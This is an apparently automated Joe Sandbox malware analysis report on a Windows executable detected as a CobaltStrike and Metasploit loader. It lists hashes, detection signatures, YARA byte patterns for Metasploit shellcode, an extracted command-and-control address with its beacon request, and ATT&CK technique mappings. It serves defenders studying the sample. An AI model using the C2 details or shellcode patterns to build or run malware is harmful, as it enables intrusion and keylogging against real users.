Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.23518.16980.exe

Overview

General Information

Sample name:SecuriteInfo.com.FileRepMalware.23518.16980.exe
Analysis ID:1521532
MD5:ea94a1fe3c2921313e7ea2b77675c7db
SHA1:dd0388d8bdfd510256f26a8e9efe025fd9381867
SHA256:ecbbb2801bb4d27db737c96ac45b2a51b449ddd9e2e2af42c1e85b79caa5a5ab
Tags:exe
Infos:

Detection

CobaltStrike, Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected Metasploit Payload
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Potentially malicious time measurement code found
Uses known network protocols on non-standard ports
Contains functionality for execution timing, often used to detect debuggers
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
PE file contains more sections than normal
PE file contains sections with non-standard names
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.FileRepMalware.23518.16980.exe (PID: 7872 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe" MD5: EA94A1FE3C2921313E7EA2B77675C7DB)
    • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"C2Server": "http://106.14.141.209:8087/hkDF", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\r\n"}
{"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\r\n", "Type": "Metasploit Download", "URL": "http://106.14.141.209/hkDF"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
      • 0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
      00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
      • 0x7d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
        Click to see the 3 entries
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeAvira: detected
        Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"C2Server": "http://106.14.141.209:8087/hkDF", "User Agent": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\r\n"}
        Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\r\n", "Type": "Metasploit Download", "URL": "http://106.14.141.209/hkDF"}
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeReversingLabs: Detection: 70%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.7% probability
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeJoe Sandbox ML: detected
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 4x nop then sub rbx, qword ptr [rax+18h]0_2_0069D240
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 4x nop then mov r8, 0000800000000000h0_2_006A6B60

        Networking

        barindex
        Source: Malware configuration extractorURLs: http://106.14.141.209:8087/hkDF
        Source: Malware configuration extractorURLs: http://106.14.141.209/hkDF
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 8087
        Source: global trafficTCP traffic: 192.168.2.10:49701 -> 106.14.141.209:8087
        Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
        Source: unknownDNS traffic detected: query: 18.31.95.13.in-addr.arpa replaycode: Name error (3)
        Source: global trafficHTTP traffic detected: GET /hkDF HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: 106.14.141.209:8087Connection: Keep-AliveCache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 106.14.141.209
        Source: unknownTCP traffic detected without corresponding DNS query: 106.14.141.209
        Source: unknownTCP traffic detected without corresponding DNS query: 106.14.141.209
        Source: unknownTCP traffic detected without corresponding DNS query: 106.14.141.209
        Source: unknownTCP traffic detected without corresponding DNS query: 106.14.141.209
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /hkDF HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: 106.14.141.209:8087Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A49C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A4F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.14.141.209:8087/hkDF
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A4F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.14.141.209:8087/hkDF&
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A4F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.14.141.209:8087/hkDFN
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A49C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.14.141.209:8087/hkDFly
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeBinary or memory string: github.com/lxn/win.registerRawInputDevices

        System Summary

        barindex
        Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
        Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_006C80600_2_006C8060
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_006850400_2_00685040
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_0069D4400_2_0069D440
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_0068B0200_2_0068B020
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_006A70000_2_006A7000
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_006B70E00_2_006B70E0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_006854A00_2_006854A0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_0069A9A00_2_0069A9A0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_00688D800_2_00688D80
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_006942600_2_00694260
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_0069EA600_2_0069EA60
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_0068BA400_2_0068BA40
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_0068C6400_2_0068C640
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_006A42E00_2_006A42E0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_00684AC70_2_00684AC7
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_0069E2A00_2_0069E2A0
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_006A6B600_2_006A6B60
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_006937050_2_00693705
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: String function: 006B2D80 appears 173 times
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: String function: 006B4E20 appears 186 times
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic PE information: Number of sections : 13 > 10
        Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
        Source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic PE information: Section: /19 ZLIB complexity 0.9934974272088354
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic PE information: Section: /32 ZLIB complexity 0.9958333333333333
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic PE information: Section: /65 ZLIB complexity 0.9972217085798817
        Source: classification engineClassification label: mal100.troj.evad.winEXE@2/1@1/1
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeFile opened: C:\Windows\system32\999e755d965c3dfa7a285ddb818297cd4da7f6037d10a9b7a28f683b480e87bfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeReversingLabs: Detection: 70%
        Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exe"
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic file information: File size 2407936 > 1048576
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic PE information: section name: /4
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic PE information: section name: /19
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic PE information: section name: /32
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic PE information: section name: /46
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic PE information: section name: /65
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic PE information: section name: /78
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic PE information: section name: /90
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exeStatic PE information: section name: .symtab
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_0000029C510F0128 push eax; ret 0_2_0000029C510F0364
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_0000029C510F02FD push eax; ret 0_2_0000029C510F0364

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 8087
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_006DB920 rdtscp0_2_006DB920
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A514000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
        Source: SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A49C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@

        Anti Debugging

        barindex
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_006DB920 Start: 006DB929 End: 006DB93F0_2_006DB920
        Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23518.16980.exeCode function: 0_2_006DB920 rdtscp0_2_006DB920

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.1518956360.0000029C510F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.1517779379.000000C000110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        DLL Side-Loading
        1
        Process Injection
        1
        Process Injection
        11
        Input Capture
        11
        Security Software Discovery
        Remote Services11
        Input Capture
        1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory1
        System Information Discovery
        Remote Desktop Protocol1
        Archive Collected Data
        11
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
        Obfuscated Files or Information
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Ingress Tool Transfer
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Software Packing
        NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA SecretsInternet Connection DiscoverySSHKeylogging112
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        SecuriteInfo.com.FileRepMalware.23518.16980.exe71%ReversingLabsWin64.Trojan.CobaltStrike
        SecuriteInfo.com.FileRepMalware.23518.16980.exe100%AviraTR/Rozena.ofeud
        SecuriteInfo.com.FileRepMalware.23518.16980.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        18.31.95.13.in-addr.arpa
        unknown
        unknowntrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://106.14.141.209/hkDFtrue
            unknown
            http://106.14.141.209:8087/hkDFtrue
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://106.14.141.209:8087/hkDF&SecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A4F9000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://106.14.141.209:8087/hkDFlySecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A49C000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://106.14.141.209:8087/hkDFNSecuriteInfo.com.FileRepMalware.23518.16980.exe, 00000000.00000002.1518227006.0000029C2A4F9000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    106.14.141.209
                    unknownChina
                    37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1521532
                    Start date and time:2024-09-28 22:25:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 2m 48s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:5
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:SecuriteInfo.com.FileRepMalware.23518.16980.exe
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@2/1@1/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated
                    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • VT rate limit hit for: SecuriteInfo.com.FileRepMalware.23518.16980.exe
                    No simulations
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdd3r1KVj317.exeGet hashmaliciousUnknownBrowse
                    • 112.74.185.5
                    http://aa5aa5aa5aa5aa44.app/Get hashmaliciousUnknownBrowse
                    • 59.82.132.217
                    http://hbyczyz.com/xrrGet hashmaliciousUnknownBrowse
                    • 47.108.5.198
                    http://www.tpckn.app/Get hashmaliciousUnknownBrowse
                    • 203.107.62.140
                    http://alibinaadi.com/.well-known/alibaba/Alibaba/index.phpGet hashmaliciousUnknownBrowse
                    • 59.82.33.225
                    cjg7obu8xR.exeGet hashmaliciousUnknownBrowse
                    • 112.74.185.5
                    cjg7obu8xR.exeGet hashmaliciousUnknownBrowse
                    • 112.74.185.5
                    http://promo1.spik.ru/CN/Get hashmaliciousHTMLPhisherBrowse
                    • 59.82.132.149
                    https://oxbike-br.com/XRpb24t/zc2liaWx/Get hashmaliciousHTMLPhisherBrowse
                    • 59.82.33.225
                    http://wwwhd4480.com/Get hashmaliciousUnknownBrowse
                    • 106.11.43.113
                    No context
                    No context
